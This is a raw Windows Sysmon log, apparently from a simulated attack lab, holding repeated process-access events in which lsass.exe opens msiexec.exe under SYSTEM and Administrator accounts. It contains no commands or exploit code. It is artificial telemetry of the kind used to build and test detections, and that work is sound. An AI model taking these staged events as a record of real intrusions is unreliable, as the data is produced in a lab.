15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691253Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691252Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691251Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691250Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691249Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691248Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691247Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691246Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691245Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691244Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691243Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691242Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691241Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691240Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691239Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691238Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691237Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691236Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691235Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691234Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691233Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691232Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 